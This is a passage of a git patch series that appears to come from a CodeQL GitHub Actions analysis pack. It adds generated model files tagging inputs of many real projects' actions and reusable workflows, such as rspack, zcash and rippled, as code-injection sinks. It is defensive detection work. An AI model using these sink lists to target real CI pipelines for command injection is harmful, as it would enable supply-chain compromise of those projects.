a/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml b/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml new file mode 100644 index 00000000000..fff6557dd41 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["web-infra-dev/rspack", "*", "inputs.post", "code-injection", "generated"] + - ["web-infra-dev/rspack", "*", "inputs.profile", "code-injection", "generated"] + - ["web-infra-dev/rspack", "*", "inputs.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml b/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml new file mode 100644 index 00000000000..e87c7cf5c06 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["webassembly/wabt", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml b/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml new file mode 100644 index 00000000000..9c556053d66 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["wntrblm/nox", "*", "inputs.python-versions", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml b/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml new file mode 100644 index 00000000000..6121c00ccfd --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["xrplf/rippled", "*", "inputs.configuration", "code-injection", "generated"] + - ["xrplf/rippled", "*", "inputs.cmake-target", "code-injection", "generated"] + - ["xrplf/rippled", "*", "inputs.cmake-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml b/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml new file mode 100644 index 00000000000..789bdb53aed --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["zcash/zcash", "*", "inputs.destination", "code-injection", "generated"] + - ["zcash/zcash", "*", "inputs.remove-first-if-exists", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml b/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml new file mode 100644 index 00000000000..58389ad753e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["zenml-io/zenml", "*", "inputs.install_integrations", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml b/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml new file mode 100644 index 00000000000..853948c5ec3 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["zeroc-ice/ice", "*", "inputs.flags", "code-injection", "generated"] + - ["zeroc-ice/ice", "*", "inputs.make_flags", "code-injection", "generated"] \ No newline at end of file From 83f9527cc489194e143ca2e21c724a4b10ec954d Mon Sep 17 00:00:00 2001 From: jorgectf Date: Thu, 11 Apr 2024 11:25:54 +0200 Subject: [PATCH 0164/1267] Add models for reusable workflows sinks --- .../0xpolygon_polygon-edge.model.yml | 6 ++++ .../reusable-workflows/8vim_8vim.model.yml | 9 ++++++ .../actions_reusable-workflows.model.yml | 11 +++++++ .../reusable-workflows/adap_flower.model.yml | 8 +++++ .../aio-libs_multidict.model.yml | 7 +++++ .../aio-libs_yarl.model.yml | 7 +++++ .../airbytehq_airbyte.model.yml | 6 ++++ .../alphagov_collections.model.yml | 6 ++++ .../alphagov_frontend.model.yml | 6 ++++ .../alphagov_publishing-api.model.yml | 6 ++++ .../reusable-workflows/apache_druid.model.yml | 15 ++++++++++ .../reusable-workflows/apache_flink.model.yml | 7 +++++ .../reusable-workflows/apache_spark.model.yml | 7 +++++ .../argilla-io_argilla.model.yml | 6 ++++ .../argoproj_argo-cd.model.yml | 8 +++++ .../argoproj_argo-rollouts.model.yml | 8 +++++ .../aws-amplify_amplify-ui.model.yml | 6 ++++ .../reusable-workflows/azure_apiops.model.yml | 6 ++++ .../azure_mlops-templates.model.yml | 13 +++++++++ .../bbq-beets_avocaddo-cmw.model.yml | 9 ++++++ .../bbq-beets_mobile-ci-cd.model.yml | 9 ++++++ .../bbq-beets_yujincat-action.model.yml | 7 +++++ .../bdunderscore_modular-avatar.model.yml | 6 ++++ .../benc-uk_workflow-dispatch.model.yml | 6 ++++ .../bridgecrewio_checkov.model.yml | 8 +++++ .../bugsnag_bugsnag-ruby.model.yml | 6 ++++ ...ecodealliance_wasm-micro-runtime.model.yml | 22 ++++++++++++++ .../celo-org_celo-blockchain.model.yml | 7 +++++ .../cemu-project_cemu.model.yml | 6 ++++ .../cesiumgs_cesium-unreal.model.yml | 29 +++++++++++++++++++ .../reusable-workflows/cgal_cgal.model.yml | 6 ++++ .../checkstyle_checkstyle.model.yml | 14 +++++++++ .../chia-network_actions.model.yml | 7 +++++ .../chipsalliance_chisel.model.yml | 7 +++++ .../clickhouse_clickhouse.model.yml | 14 +++++++++ .../cloudfoundry_cli.model.yml | 6 ++++ .../cocotb_cocotb.model.yml | 8 +++++ .../codeigniter4_codeigniter4.model.yml | 9 ++++++ .../com-lihaoyi_mill.model.yml | 7 +++++ .../cosmos_ibc-go.model.yml | 17 +++++++++++ .../crowdsecurity_crowdsec.model.yml | 7 +++++ .../cryptomator_cryptomator.model.yml | 7 +++++ .../daeuniverse_dae.model.yml | 7 +++++ .../dafny-lang_dafny.model.yml | 9 ++++++ .../dagger_dagger.model.yml | 7 +++++ .../dash-industry-forum_dash.js.model.yml | 7 +++++ .../datadog_dd-trace-go.model.yml | 6 ++++ .../datadog_dd-trace-py.model.yml | 7 +++++ .../datafuselabs_databend.model.yml | 7 +++++ .../dbt-labs_dbt-bigquery.model.yml | 14 +++++++++ .../dbt-labs_dbt-core.model.yml | 9 ++++++ .../dbt-labs_dbt-snowflake.model.yml | 14 +++++++++ .../decidim_decidim.model.yml | 6 ++++ .../defectdojo_django-defectdojo.model.yml | 6 ++++ ...dependencytrack_dependency-track.model.yml | 6 ++++ .../devexpress_testcafe.model.yml | 10 +++++++ .../dfhack_dfhack.model.yml | 18 ++++++++++++ .../docker_build-push-action.model.yml | 7 +++++ .../dragonwell-project_dragonwell11.model.yml | 6 ++++ .../earthly_earthly.model.yml | 22 ++++++++++++++ .../eclipse-vertx_vert.x.model.yml | 6 ++++ .../eclipse-vertx_vertx-sql-client.model.yml | 6 ++++ .../elastic_elasticsearch-net.model.yml | 6 ++++ .../element-hq_element-desktop.model.yml | 11 +++++++ .../etcd-io_bbolt.model.yml | 7 +++++ .../reusable-workflows/etcd-io_etcd.model.yml | 9 ++++++ .../eventstore_eventstore.model.yml | 7 +++++ .../expensify_app.model.yml | 6 ++++ ...xternal-secrets_external-secrets.model.yml | 7 +++++ .../facebook_create-react-app.model.yml | 6 ++++ .../facebookresearch_xformers.model.yml | 15 ++++++++++ .../falcosecurity_falco.model.yml | 11 +++++++ .../fastify_fastify.model.yml | 6 ++++ .../ferretdb_ferretdb.model.yml | 6 ++++ .../filecoin-project_venus.model.yml | 9 ++++++ .../firebase_firebase-unity-sdk.model.yml | 19 ++++++++++++ .../flarum_framework.model.yml | 6 ++++ .../fluent_fluent-bit.model.yml | 13 +++++++++ .../flux-iac_tofu-controller.model.yml | 6 ++++ .../flyteorg_flyte.model.yml | 8 +++++ .../foundatiofx_foundatio.model.yml | 8 +++++ .../freecad_freecad.model.yml | 6 ++++ .../getpelican_pelican.model.yml | 8 +++++ .../getporter_porter.model.yml | 6 ++++ .../getsentry_sentry-dart.model.yml | 7 +++++ .../getsentry_sentry-unity.model.yml | 7 +++++ .../gitpod-io_gitpod.model.yml | 6 ++++ .../gittools_gitversion.model.yml | 6 ++++ ...ooglecloudplatform_magic-modules.model.yml | 6 ++++ ...loudplatform_nodejs-docs-samples.model.yml | 7 +++++ .../gravitational_teleport.model.yml | 6 ++++ .../gravitl_netmaker.model.yml | 6 ++++ .../reusable-workflows/h2oai_wave.model.yml | 8 +++++ .../hadashia_vcontainer.model.yml | 7 +++++ .../hashicorp_boundary.model.yml | 6 ++++ .../hashicorp_consul.model.yml | 7 +++++ .../hashicorp_terraform-cdk.model.yml | 15 ++++++++++ ...hashicorp_terraform-provider-tfe.model.yml | 6 ++++ .../hashicorp_terraform.model.yml | 9 ++++++ .../hashicorp_vault.model.yml | 16 ++++++++++ .../reusable-workflows/heroku_cli.model.yml | 7 +++++ .../hitobito_hitobito.model.yml | 7 +++++ .../home-assistant_operating-system.model.yml | 7 +++++ .../homuler_mediapipeunityplugin.model.yml | 11 +++++++ .../huggingface_doc-builder.model.yml | 14 +++++++++ .../huggingface_transformers.model.yml | 7 +++++ .../hyperion-project_hyperion.ng.model.yml | 8 +++++ .../reusable-workflows/ibm_sarama.model.yml | 6 ++++ ...nloader_icloud_photos_downloader.model.yml | 6 ++++ .../immich-app_immich.model.yml | 6 ++++ .../reusable-workflows/inria_spoon.model.yml | 6 ++++ ...el-device-plugins-for-kubernetes.model.yml | 6 ++++ .../inverse-inc_packetfence.model.yml | 6 ++++ .../reusable-workflows/ispc_ispc.model.yml | 6 ++++ ..._intellij-platform-gradle-plugin.model.yml | 6 ++++ .../jupyter_docker-stacks.model.yml | 13 +++++++++ .../kairos-io_kairos.model.yml | 23 +++++++++++++++ .../kanidm_kanidm.model.yml | 6 ++++ .../kata-containers_kata-containers.model.yml | 20 +++++++++++++ .../reusable-workflows/kiali_kiali.model.yml | 16 ++++++++++ .../kotest_kotest.model.yml | 6 ++++ .../kubernetes_ingress-nginx.model.yml | 7 +++++ .../kubescape_kubescape.model.yml | 9 ++++++ .../kubeshop_botkube.model.yml | 7 +++++ .../reusable-workflows/kumahq_kuma.model.yml | 9 ++++++ .../labring_sealos.model.yml | 15 ++++++++++ .../laion-ai_open-assistant.model.yml | 6 ++++ .../learningequality_kolibri.model.yml | 9 ++++++ .../lensesio_stream-reactor.model.yml | 6 ++++ .../leptos-rs_leptos.model.yml | 8 +++++ .../lightning-ai_pytorch-lightning.model.yml | 7 +++++ .../liquibase_liquibase.model.yml | 6 ++++ .../litestar-org_litestar.model.yml | 7 +++++ .../reusable-workflows/llvm_circt.model.yml | 13 +++++++++ .../lnbits_lnbits.model.yml | 6 ++++ .../lutris_lutris.model.yml | 6 ++++ .../reusable-workflows/mailu_mailu.model.yml | 8 +++++ .../mamba-org_mamba.model.yml | 7 +++++ ...anticoresoftware_manticoresearch.model.yml | 14 +++++++++ .../marcelotduarte_cx_freeze.model.yml | 6 ++++ ...xaml_materialdesigninxamltoolkit.model.yml | 9 ++++++ .../matter-labs_zksync-era.model.yml | 7 +++++ .../mattermost_desktop.model.yml | 6 ++++ .../mattermost_mattermost.model.yml | 10 +++++++ .../mealie-recipes_mealie.model.yml | 6 ++++ .../meshery_meshery.model.yml | 16 ++++++++++ .../meshtastic_firmware.model.yml | 10 +++++++ .../microcks_microcks.model.yml | 6 ++++ ...crosoft_applicationinsights-java.model.yml | 6 ++++ .../microsoft_chat-copilot.model.yml | 11 +++++++ .../microsoft_msquic.model.yml | 18 ++++++++++++ .../microsoft_oryx.model.yml | 6 ++++ .../microsoft_pr-metrics.model.yml | 6 ++++ ...oft_react-native-windows-samples.model.yml | 13 +++++++++ .../microsoft_vscode-cpptools.model.yml | 6 ++++ .../moby_buildkit.model.yml | 10 +++++++ .../reusable-workflows/moby_moby.model.yml | 7 +++++ .../mosaicml_composer.model.yml | 11 +++++++ .../msys2_setup-msys2.model.yml | 7 +++++ .../mudler_localai.model.yml | 7 +++++ .../mustardchef_wsabuilds.model.yml | 15 ++++++++++ .../reusable-workflows/n8n-io_n8n.model.yml | 6 ++++ .../napari_napari.model.yml | 6 ++++ .../reusable-workflows/nasa_fprime.model.yml | 9 ++++++ .../nautobot_nautobot.model.yml | 6 ++++ .../reusable-workflows/nektos_act.model.yml | 13 +++++++++ .../neovim_neovim.model.yml | 6 ++++ .../nethermindeth_nethermind.model.yml | 11 +++++++ .../newrelic_newrelic-dotnet-agent.model.yml | 10 +++++++ .../newrelic_newrelic-java-agent.model.yml | 7 +++++ .../newrelic_node-newrelic.model.yml | 9 ++++++ .../nexus-mods_nexusmods.app.model.yml | 9 ++++++ .../nginxinc_kubernetes-ingress.model.yml | 16 ++++++++++ .../nocodb_nocodb.model.yml | 7 +++++ .../reusable-workflows/novuhq_novu.model.yml | 20 +++++++++++++ .../npm_abbrev-js.model.yml | 6 ++++ .../reusable-workflows/npm_cli.model.yml | 7 +++++ .../npm_fs-minipass.model.yml | 6 ++++ .../npm_hosted-git-info.model.yml | 6 ++++ .../reusable-workflows/npm_ini.model.yml | 6 ++++ ...pm_json-parse-even-better-errors.model.yml | 6 ++++ .../npm_minify-registry-metadata.model.yml | 6 ++++ .../npm_mute-stream.model.yml | 6 ++++ .../npm_node-semver.model.yml | 6 ++++ .../npm_node-which.model.yml | 6 ++++ .../reusable-workflows/npm_nopt.model.yml | 6 ++++ .../npm_normalize-package-data.model.yml | 6 ++++ .../npm_write-file-atomic.model.yml | 6 ++++ .../onflow_cadence.model.yml | 9 ++++++ .../open-goal_jak-project.model.yml | 11 +++++++ ...pen-telemetry_opentelemetry-demo.model.yml | 6 ++++ ...try_opentelemetry-dotnet-contrib.model.yml | 7 +++++ ...n-telemetry_opentelemetry-dotnet.model.yml | 7 +++++ ...entelemetry-java-instrumentation.model.yml | 7 +++++ ...lemetry_opentelemetry-js-contrib.model.yml | 6 ++++ ...telemetry_opentelemetry-operator.model.yml | 8 +++++ .../openbao_openbao.model.yml | 11 +++++++ .../openhab_openhab-docs.model.yml | 9 ++++++ .../openmined_pysyft.model.yml | 7 +++++ .../opentofu_opentofu.model.yml | 9 ++++++ .../openttd_openttd.model.yml | 17 +++++++++++ .../openvinotoolkit_openvino.model.yml | 6 ++++ .../reusable-workflows/openxla_iree.model.yml | 12 ++++++++ .../reusable-workflows/openzfs_zfs.model.yml | 6 ++++ ...ator-framework_java-operator-sdk.model.yml | 8 +++++ .../orange-opensource_hurl.model.yml | 6 ++++ ...aolosalvatori_servicebusexplorer.model.yml | 7 +++++ .../parcel-bundler_parcel.model.yml | 6 ++++ .../pardeike_harmony.model.yml | 6 ++++ .../reusable-workflows/pcsx2_pcsx2.model.yml | 12 ++++++++ .../pennylaneai_pennylane.model.yml | 8 +++++ ...necone-io_pinecone-python-client.model.yml | 6 ++++ .../pixie-io_pixie.model.yml | 8 +++++ .../plantuml_plantuml.model.yml | 6 ++++ .../powerdns_pdns.model.yml | 8 +++++ .../preactjs_preact.model.yml | 7 +++++ .../prismlauncher_prismlauncher.model.yml | 6 ++++ .../product-os_flowzone.model.yml | 6 ++++ .../project-oak_oak.model.yml | 7 +++++ .../reusable-workflows/prql_prql.model.yml | 6 ++++ .../pulumi_pulumi.model.yml | 10 +++++++ .../puppetlabs_puppetlabs-puppetdb.model.yml | 8 +++++ .../reusable-workflows/pyo3_maturin.model.yml | 6 ++++ .../reusable-workflows/pyo3_pyo3.model.yml | 6 ++++ .../python_cpython.model.yml | 7 +++++ .../pytorch_botorch.model.yml | 6 ++++ .../reusable-workflows/pytorch_xla.model.yml | 6 ++++ .../quarto-dev_quarto-cli.model.yml | 6 ++++ .../rancher_dashboard.model.yml | 9 ++++++ .../rasterio_rasterio.model.yml | 6 ++++ .../redisearch_redisearch.model.yml | 6 ++++ .../remix-run_remix.model.yml | 6 ++++ .../rmcrackan_libation.model.yml | 9 ++++++ .../rocketchat_rocket.chat.model.yml | 6 ++++ .../ruby_ruby.wasm.model.yml | 6 ++++ .../rustdesk_rustdesk.model.yml | 8 +++++ .../saadeghi_daisyui.model.yml | 7 +++++ .../sagemath_sage.model.yml | 12 ++++++++ .../schemastore_schemastore.model.yml | 7 +++++ .../scikit-learn_scikit-learn.model.yml | 6 ++++ .../seleniumhq_selenium.model.yml | 7 +++++ .../shaka-project_shaka-packager.model.yml | 8 +++++ .../shaka-project_shaka-player.model.yml | 9 ++++++ .../shimataro_ssh-key-action.model.yml | 6 ++++ .../softfever_orcaslicer.model.yml | 7 +++++ ...-mansion_react-native-reanimated.model.yml | 6 ++++ .../solana-labs_solana.model.yml | 6 ++++ .../sonarr_sonarr.model.yml | 7 +++++ .../speedb-io_speedb.model.yml | 7 +++++ ...ring-cloud_spring-cloud-dataflow.model.yml | 6 ++++ .../sqlfluff_sqlfluff.model.yml | 8 +++++ .../stdlib-js_stdlib.model.yml | 9 ++++++ .../stereokit_stereokit.model.yml | 10 +++++++ .../streetsidesoftware_cspell.model.yml | 6 ++++ .../supabase_auth.model.yml | 6 ++++ .../reusable-workflows/supabase_cli.model.yml | 6 ++++ .../tencent_hippy.model.yml | 9 ++++++ .../tgstation_tgstation.model.yml | 8 +++++ .../thesofproject_sof.model.yml | 6 ++++ .../tiann_kernelsu.model.yml | 8 +++++ .../tiledb-inc_tiledb.model.yml | 7 +++++ .../toeverything_affine.model.yml | 6 ++++ .../tracel-ai_burn.model.yml | 6 ++++ .../tribler_tribler.model.yml | 6 ++++ .../ubisoft_sharpmake.model.yml | 7 +++++ .../unity-technologies_ml-agents.model.yml | 6 ++++ .../reusable-workflows/urbit_urbit.model.yml | 7 +++++ .../uyuni-project_uyuni.model.yml | 7 +++++ .../vert-x3_vertx-hazelcast.model.yml | 7 +++++ .../reusable-workflows/vkcom_vkui.model.yml | 6 ++++ .../walletconnect_web3modal.model.yml | 6 ++++ .../warzone2100_warzone2100.model.yml | 6 ++++ .../wasmedge_wasmedge.model.yml | 10 +++++++ .../web-infra-dev_rspack.model.yml | 7 +++++ .../reusable-workflows/werf_werf.model.yml | 21 ++++++++++++++ .../widdix_aws-cf-templates.model.yml | 6 ++++ .../wildfly_wildfly.model.yml | 9 ++++++ .../yt-dlp_yt-dlp.model.yml | 11 +++++++ .../zenml-io_zenml.model.yml | 8 +++++ .../zephyrproject-rtos_zephyr.model.yml | 6 ++++ .../zitadel_zitadel.model.yml | 9 ++++++ 281 files changed, 2322 insertions(+) create mode 100644 ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml create mode 100644 